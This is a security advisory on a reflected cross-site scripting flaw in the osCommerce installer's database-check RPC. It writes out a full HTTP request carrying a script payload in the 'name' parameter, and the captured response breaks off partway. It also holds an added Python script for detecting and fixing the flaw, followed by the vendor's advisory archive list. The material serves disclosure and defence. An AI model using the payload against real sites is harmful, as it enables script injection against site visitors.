Trustwave's SpiderLabs Security Advisory TWSL2012-005:
Cross-Site Scripting Vulnerability in osCommerce

Published: 03/23/12
Version: 1.0

Vendor: osCommerce (http://oscommerce.com/)
Product: osCommerce
Version affected: v3.0.2 and prior versions

Product description:
osCommerce is an e-commerce solution that is available for free as an Open Source based solution released under the GNU General Public License.

Credit: Jonathan Claudius of Trustwave SpiderLabs

Finding 1: Cross-Site Scripting Vulnerabilities in "name" parameter in 'index.php' page
CVE: CVE-2012-1792

After extracting the osCommerce source files onto a web server, but before the application is fully installed, cross-site scripting vulnerabilities are present in the root 'index.php' page. The "name" parameter submitted to the database-check RPC is reflected into the JSON error message without output encoding, and the response is served as text/html.

Example: Performing XSS on "name" parameter

#Request
POST /oscommerce/index.php?RPC&Setup&Install&DBCheck HTTP/1.1
Host: A.B.C.D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://A.B.C.D/oscommerce/index.php?Install
Content-Length: 97
Cookie: Setup[language]=en_US; 9d4bb4a09f511681369671a08beff228=tomvi1uuhul0m676ha8and9fn6
Pragma: no-cache
Cache-Control: no-cache

server=&username=&password=&name=%3Cscript%3Ealert(123)%3C%2Fscript%3E&port=&class=MySQL_Standard

#Response
HTTP/1.1 200 OK
Date: Wed, 18 Jan 2012 20:56:07 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 138
Connection: close
Content-Type: text/html; charset=utf-8

{"result":false,"error_message":"SQLSTATE[42000] [1044] Access denied for user ''@'localhost' to database '

Security Advisories | Trustwave
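The exchange above shows two things a defender would want to check in their own application's responses: a request parameter that comes back in the body without output encoding, and a JSON body served with a text/html Content-Type, which lets a browser render the reflected markup. The script below is an added example written for this page in Python; it is not code from the advisory or from osCommerce. The request body and response headers are copied from the advisory, while the response body is a constructed sample: the advisory's capture is truncated, so the assumption that the raw "name" value follows "to database '" is mine. The function names (reflected_unencoded, json_served_as_html, safe_error_response) are also mine.

```python
"""Checks for the two weaknesses visible in the TWSL2012-005 exchange and a
hardened way to build the same error response.

Added example, not code from the advisory or from osCommerce.
"""
import html
import json
from urllib.parse import parse_qs

# Request body as shown in the advisory.
SAMPLE_REQUEST_BODY = (
    "server=&username=&password=&name=%3Cscript%3Ealert(123)%3C%2Fscript%3E"
    "&port=&class=MySQL_Standard"
)
# Response headers as shown in the advisory (only the relevant one kept).
SAMPLE_RESPONSE_HEADERS = {"Content-Type": "text/html; charset=utf-8"}
# Constructed response body: the advisory's capture stops at "to database '",
# so the reflected value that follows is an assumption made for this example.
SAMPLE_RESPONSE_BODY = (
    '{"result":false,"error_message":"SQLSTATE[42000] [1044] Access denied for '
    "user ''@'localhost' to database '<script>alert(123)</script>'\"}"
)


def reflected_unencoded(request_body, response_body, param):
    """True if a value of `param` that contains HTML-significant characters
    appears verbatim (i.e. not entity-encoded) in the response body."""
    values = parse_qs(request_body, keep_blank_values=True).get(param, [])
    for value in values:
        needs_encoding = html.escape(value, quote=True) != value
        if value and needs_encoding and value in response_body:
            return True
    return False


def json_served_as_html(headers, body):
    """True if the body parses as JSON but is not declared application/json
    and MIME sniffing is not disabled. A body that is not valid JSON (for
    instance a truncated capture) is reported as False, not as a finding."""
    try:
        json.loads(body)
    except ValueError:
        return False
    ctype = headers.get("Content-Type", "").lower()
    nosniff = headers.get("X-Content-Type-Options", "").lower() == "nosniff"
    return not ctype.startswith("application/json") and not nosniff


def safe_error_response(message):
    """Build the error response the way a fix would: entity-encode the
    message before embedding it, declare application/json, and forbid MIME
    sniffing. Returns (headers, body)."""
    body = json.dumps({"result": False,
                       "error_message": html.escape(message, quote=True)})
    headers = {"Content-Type": "application/json; charset=utf-8",
               "X-Content-Type-Options": "nosniff"}
    return headers, body


def check_exchange(request_body, headers, body, param="name"):
    """Run both checks over one request/response pair; returns finding names."""
    findings = []
    if reflected_unencoded(request_body, body, param):
        findings.append("unencoded reflection of '%s'" % param)
    if json_served_as_html(headers, body):
        findings.append("JSON body served without application/json or nosniff")
    return findings


if __name__ == "__main__":
    print("Captured exchange:", check_exchange(
        SAMPLE_REQUEST_BODY, SAMPLE_RESPONSE_HEADERS, SAMPLE_RESPONSE_BODY))
    fixed_headers, fixed_body = safe_error_response(
        "SQLSTATE[42000] [1044] Access denied for user ''@'localhost' to "
        "database '<script>alert(123)</script>'")
    print("Hardened response:", check_exchange(
        SAMPLE_REQUEST_BODY, fixed_headers, fixed_body))
```

Running the script reports both findings for the captured exchange and none for the hardened response. The detection is deliberately simple (a verbatim substring match on the decoded parameter), which is enough to catch the case in the advisory; a general scanner would also look for the value inside JavaScript string contexts, where HTML entity encoding alone is not sufficient.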

Security Advisories

Spending each day immersed in penetration tests and research into the latest threats, our SpiderLabs© experts occasionally discover new vulnerabilities as a part of their work.

Latest Advisory

TWSL2018-005: Vulnerability in WD My Cloud personal cloud storage

Oct 29, 2018 - Reliable, centralized personal storage with automatic backup that plugs into your own home network. Share whatever you want, anywhere you have an Internet connection.

Advisory Archive


Advisory | Title | Date
TWSL2018-011 | Use after free vulnerability in QFX Software KeyScrambler | Oct 02, 2018
TWSL2018-010 | Credential Leak Flaws in Windows PureVPN Client | Sep 27, 2018
TWSL2018-009 | CVE-2018-16962: Webroot SecureAnywhere macOS Kernel Level Memory Corruption | Sep 13, 2018
TWSL2018-008 | CVE-2018-8006 - Cross-Site Scripting (XSS) Vulnerability in Apache ActiveMQ | Aug 24, 2018
TWSL2018-007 | CVE-2018-2892 - Kernel Level Privilege Escalation in Oracle Solaris | Jul 24, 2018
TWSL2018-006 | Unpatched Remote Code Execution in Reprise License Manager | Jul 18, 2018
TWSL2018-004 | Vulnerabilities in NETGEAR Nighthawk X4S router (R7800) | Feb 07, 2018
TWSL2018-002 | Vulnerabilities in NETGEAR R8500 router firmware | Feb 07, 2018
TWSL2018-003 | Vulnerabilities in NETGEAR R8500 router firmware | Feb 07, 2018
TWSL2018-001 | Multiple Vulnerabilities in WD My Cloud personal cloud storage | Feb 01, 2018
TWSL2017-017 | Remote Unauthenticated DoS in Debut embedded httpd server used by Brother printers. | Nov 17, 2017
TWSL2017-016 | Local kernel heap buffer overflow Vulnerability in ESET DESLock+ client application | Aug 15, 2017
TWSL2017-015 | Multiple Vulnerabilities in ManageEngine Applications Manager | Aug 09, 2017
TWSL2017-014 | Multiple Vulnerabilities in ManageEngine OpManager | Jul 26, 2017
TWSL2017-013 | Multiple Authentication Bypass Vulnerabilities in ManageEngine Applications Manager | Jul 26, 2017
TWSL2017-012 | Remote un-authenticated DoS in IPsec-Tools Racoon | Jul 09, 2017
TWSL2017-011 | Lockscreen Lockout Bypass in Elephone P9000 Android Smartphone | Jun 28, 2017
TWSL2017-010 | Multiple Vulnerabilities in Humax Routers | Jun 28, 2017
TWSL2017-009 | Multiple Vulnerabilities in Avast Antivirus | Mar 31, 2017
TWSL2017-008 | Unauthenticated Privilege Escalation Vulnerability in Serv-U FTP/MFT Server | Mar 22, 2017
TWSL2017-007 | Undocumented Backdoor Account in DBLTek GoIP | Mar 02, 2017
TWSL2017-006 | Multiple Vulnerabilities in Polystar Jupiter | Feb 22, 2017
TWSL2017-005 | Improper Input Validation Vulnerability in SAP Adaptive Server Enterprise | Feb 13, 2017
TWSL2017-004 | Unauthenticated Backdoor Access in Unanet | Feb 08, 2017
TWSL2017-003 | Multiple Vulnerabilities in NETGEAR Routers | Jan 30, 2017
TWSL2017-002 | Multiple Vulnerabilities in McAfee Security Scan Plus | Jan 23, 2017
TWSL2017-001 | Multiple Vulnerabilities in Digitech Systems PaperVision Enterprise | Jan 11, 2017
TWSL2016-021 | Plugin authentication by-pass Vulnerability in Microsoft Skype for Mac OS-X | Dec 13, 2016
TWSL2016-020 | Buffer Overflow Vulnerability in B Labs Bopup Communication Server | Nov 03, 2016
TWSL2016-019 | Multiple XSS Vulnerabilities in Zeuscart | Sep 21, 2016
TWSL2016-018 | Multiple Persistent XSS Vulnerabilities in D-Link DSL-2740E ADSL Router | Sep 16, 2016
TWSL2016-017 | SQL Injection Vulnerability in SAP Adaptive Server Enterprise | Sep 16, 2016
TWSL2016-016 | Multiple Vulnerabilities in Opsview Monitor Pro | Sep 01, 2016
TWSL2016-015 | Password Disclosure Vulnerability in Cisco Connected Streaming Analytics | Aug 11, 2016
TWSL2016-014 | Vulnerabilities in ComfortLink™ II XL850 | Aug 11, 2016
TWSL2016-013 | Unrestricted File Creation vulnerability in SAP Adaptive Server Enterprise | Aug 02, 2016
TWSL2016-012 | Multiple Vulnerabilities in Lenovo Solution Center | Jun 23, 2016
TWSL2016-011 | Multiple Vulnerabilities in Oracle GlassFish Server Open Source Edition 3.0.1 | Jun 08, 2016
TWSL2016-010 | Information Disclosure vulnerability in SAP ASE Installer | May 26, 2016
TWSL2016-009 | Privilege Escalation Vulnerability in Lenovo Solution Center | May 11, 2016
TWSL2016-008 | SQL injection vulnerability in SAP ASE | May 09, 2016
TWSL2016-007 | Multiple Vulnerabilities in Cacti | Apr 20, 2016
TWSL2016-006 | Multiple Vulnerabilities in Zen Cart | Mar 25, 2016
TWSL2016-005 | Vulnerabilities in DevArt dotConnect for Oracle | Mar 10, 2016
TWSL2016-003 | Unsafe unlinking of files in Sophos Antivirus | Mar 09, 2016
TWSL2016-004 | Multiple Vulnerabilities in Magnolia CMS | Mar 09, 2016
TWSL2016-002 | Multiple Vulnerabilities in iNovah | Feb 18, 2016
TWSL2016-001 | Multiple Vulnerabilities in Cisco Meraki | Jan 13, 2016
TWSL2015-024 | Multiple Vulnerabilities in Proxmox Mail Gateway | Dec 30, 2015
TWSL2015-023 | Missing authorization check in SAP Adaptive Server Enterprise | Dec 09, 2015
TWSL2015-022 | Cross-Site Scripting in VMware Virtual Center Appliance (vCSA) Web Application Console | Nov 17, 2015
TWSL2015-021 | Joomla SQL Injection Vulnerability | Oct 22, 2015
TWSL2015-020 | Unauthenticated Local File Inclusion Vulnerability in Oracle Open Commerce Platform 3.4 | Oct 20, 2015
TWSL2015-019 | Privilege escalation vulnerability in Oracle Database | Oct 20, 2015
TWSL2015-018 | Service Privilege Elevation in Lenovo System Update 5 | Oct 15, 2015
TWSL2015-017 | Reflected File Download in Red Hat Feedhenry | Oct 09, 2015
TWSL2015-016 | Path Traversal in Oracle GlassFish Server Open Source Edition | Aug 27, 2015
TWSL2015-015 | Multiple Vulnerabilities in SAP Adaptive Server Enterprise | Jul 17, 2015
TWSL2015-014 | Account Probing Vulnerability in Oracle Database | Jul 15, 2015
TWSL2015-013 | Buffer Overflow Vulnerability in Oracle MySQL | Jul 15, 2015
TWSL2015-012 | XSS in Oracle Java Server Faces | Jul 15, 2015
TWSL2015-011 | Vulnerability in the pam_unix module in Linux-PAM | Jun 26, 2015
TWSL2015-010 | Reflected Cross-site Scripting Vulnerabilities in codeBeamer | Jun 09, 2015
TWSL2015-009 | Request Hijacking Bypass Vulnerability In RubyGems | Jun 08, 2015
TWSL2015-008 | Multiple Vulnerabilities in SAP Adaptive Server Enterprise | May 22, 2015
TWSL2015-007 | Request Hijacking Vulnerability In RubyGems | May 18, 2015
TWSL2015-006 | Multiple Vulnerabilities in QlikView | May 13, 2015
TWSL2015-005 | Blind SQL injection in XpanceNET | Apr 24, 2015
TWSL2015-004 | "Probe" login access vulnerability in SAP ASE | Apr 23, 2015
TWSL2015-003 | Multiple Vulnerabilities in SAP Adaptive Server Enterprise | Mar 19, 2015
TWSL2015-002 | Cross-Site Scripting in Magnolia CMS | Feb 12, 2015
TWSL2015-001 | Multiple Vulnerabilities in IceWarp Mail Server | Feb 12, 2015
TWSL2014-016 | Reflected Cross-Site Scripting Vulnerability in VMware Virtual Center Appliance (vCSA) Web Application Console | Dec 05, 2014
TWSL2014-015 | Cross Site Scripting Vulnerability in Gizmox WebGui | Oct 29, 2014
TWSL2014-014 | Multiple Vulnerabilities in Gerber WebPDM Product Data Management System | Oct 24, 2014
TWSL2014-013 | Privilege Escalation Vulnerability and Potential Remote Code Execution in SAP Adaptive Server Enterprise | Sep 12, 2014
TWSL2014-011 | Secure Desktop Protection Bypass in Keepass | Aug 05, 2014
TWSL2014-012 | Secure Desktop Protection Bypass in 1Password for Windows | Aug 05, 2014
TWSL2014-010 | Multiple Vulnerabilities in Wing FTP Server | Jul 02, 2014
TWSL2014-009 | Multiple Vulnerabilities in BSS Company Software | Jul 01, 2014
TWSL2014-008 | Cross Site Scripting Vulnerability in Cisco ASA | May 28, 2014
TWSL2014-007 | Multiple Vulnerabilities in Y-Cam | May 01, 2014
TWSL2014-006 | NetSupport Manager Information Disclosure Vulnerability | Apr 17, 2014
TWSL2014-005 | VPN Privilege Escalation Vulnerability in Cisco ASA | Apr 09, 2014
TWSL2014-004 | Information Disclosure in the BC Collected Information Export Extension for eZ Publish CMS | Mar 20, 2014
TWSL2014-003 | Blind SQL Injection Vulnerability in Tableau Server | Jan 24, 2014
TWSL2014-002 | Buffer Overflow Vulnerability in DaumGame ActiveX | Jan 06, 2014
TWSL2014-001 | Multiple Vulnerabilities in Franklin Fueling's TS-550 evo | Jan 03, 2014
TWSL2013-032 | Path Traversal Vulnerability in FTPDrive | Nov 20, 2013
TWSL2013-033 | Multiple Vulnerabilities in Easy File Manager | Nov 20, 2013
TWSL2013-034 | Path Traversal Vulnerability in WiFi HD Free | Nov 20, 2013
TWSL2013-031 | Information Disclosure Vulnerability in RiskNet Acquirer | Nov 07, 2013
TWSL2013-030 | Multiple Vulnerabilities in Quixplorer | Nov 06, 2013
TWSL2013-029 | Information Disclosure Vulnerability in QNAP Photo Station | Sep 27, 2013
TWSL2013-028 | Persistent Denial of Service Vulnerability in Vino VNC Server | Sep 16, 2013
TWSL2013-027 | Multiple Vulnerabilities in ajaXplorer | Sep 05, 2013
TWSL2013-026 | Multiple Web Application Vulnerabilities in RockMongo | Aug 16, 2013
TWSL2013-024 | Cross Site Scripting (XSS) vulnerability in McAfee Superscan 4.0 | Aug 02, 2013
TWSL2013-025 | Arbitrary File Upload Vulnerability in Official Nmap | Aug 02, 2013
TWSL2013-020 | Hard-Coded Bluetooth PIN Vulnerability in LIXIL Satis Toilet | Aug 01, 2013
TWSL2013-021 | Multiple Vulnerabilities in Karotz Smart Rabbit | Aug 01, 2013
TWSL2013-022 | No Authentication Vulnerability in Radio Thermostat | Aug 01, 2013
TWSL2013-023 | Lack of Web and API Authentication Vulnerability in INSTEON Hub | Aug 01, 2013
TWSL2013-018 | Multiple Vulnerabilities in OpenEMR | Jul 12, 2013
TWSL2013-007 | Multiple Vulnerabilities in VLC Media Player - Web Interface. | Jun 10, 2013
TWSL2013-006 | Cross-Site Scripting Vulnerability in Coldbox. | Jun 10, 2013
TWSL2013-008 | Command Injection Vulnerabilities in Linksys Routers. | May 31, 2013
TWSL2013-002 | Multiple XSS Vulnerabilities in The Bug Genie. | May 09, 2013
TWSL2013-004 | Group Name Enumeration Vulnerability in Cisco IKE Implementation. | Apr 18, 2013
TWSL2012-016 | Multiple Vulnerabilities in Bitweaver | Oct 23, 2012
TWSL2012-019 | Cross-Site Scripting Vulnerability in Support Incident Tracker | Aug 29, 2012
TWSL2012-014 | Multiple Vulnerabilities in Scrutinizer NetFlow and sFlow Analyzer | Jul 27, 2012
TWSL2012-004 | Multiple Vulnerabilities in Zen Cart | May 03, 2012
TWSL2012-012 | Cross-Site Scripting Vulnerability in Support Incident Tracker | Apr 20, 2012
TWSL2012-008 | Multiple Vulnerabilities in Scrutinizer NetFlow | Apr 10, 2012
TWSL2012-005 | Cross-Site Scripting Vulnerability in osCommerce Platform | Mar 23, 2012
TWSL2012-003 | Cross-Site Scripting Vulnerability in Movable Type Publishing Platform | Feb 24, 2012
TWSL2012-002 | Multiple Vulnerabilities in WordPress | Jan 24, 2012
TWSL2012-001 | Cross-Site Scripting Vulnerability in Textpattern Content Management System | Jan 03, 2012
TWSL2011-019 | Cross-Site Scripting Vulnerability in phpMyAdmin | Dec 22, 2011
TWSL2011-018 | Authentication Bypass Vulnerability in IBM TS3100/TS3200 Web User Interface | Dec 20, 2011
TWSL2011-017 | Multiple Vulnerabilities in Merethis Centreon | Nov 04, 2011
TWSL2011-014 | Vulnerability in Pantech Web Browser SSL Implementation | Sep 23, 2011
TWSL2011-013 | Multiple Vulnerabilities in IceWarp Mail Server | Sep 23, 2011
TWSL2011-008 | Focus Stealing Vulnerability in Android | Aug 06, 2011
TWSL2011-007 | iOS SSL Implementation Does Not Validate Certificate Chain | Jul 25, 2011
TWSL2011-006 | IBM Web Application Firewall Bypass | Jun 21, 2011
TWSL2011-005 | Directory Traversal in Trustwave WebDefend Enterprise | Jun 17, 2011
TWSL2011-004 | Cross-Site Scripting Vulnerability in ZyXEL ZyWALL 70 Firewall | Jun 10, 2011
TWSL2011-003 | Vulnerabilities discovered in Avocent Cyclades ACS Web Manager | Mar 11, 2011
TWSL2011-001 | Vulnerabilities in Trustwave WebDefend Enterprise | Feb 15, 2011
TWSL2011-002 | Vulnerabilities in Comcast DOCSIS 3.0 Business Gateways (SMCD3G-CCR) | Feb 04, 2011
TWSL2010-008 | Clear iSpot/Clearspot CSRF Vulnerabilities | Dec 10, 2010
TWSL2010-007 | Passlogix v-GO Self-Service Password Reset Bypass via Invalid SSL Certificate | Dec 10, 2010
TWSL2010-006 | Multiple Vulnerabilities in Camtron CMNC-200 IP Camera | Nov 12, 2010
TWSL2010-005 | FreePBX recordings interface allows remote code execution | Sep 23, 2010
TWSL2010-003 | Unauthorized access to root NFS export on EMC Celerra Network Attached Storage (NAS) appliance | Jul 29, 2010
TWSL2010-002 | Web Service Hijacking in VMWare WebAccess | Mar 30, 2010
TWSL2010-001 | View state tampering vulnerabilities in products from Microsoft, Apache, and Sun Microsystems | Feb 03, 2010
TWSL2009-002 | Cisco's Adaptive Security Appliance (ASA) Web VPN Multiple Vulnerabilities | Jun 24, 2009
TWSL2009-001 | Profense Web Application Firewall and Load Balancer multiple vulnerabilities | May 19, 2009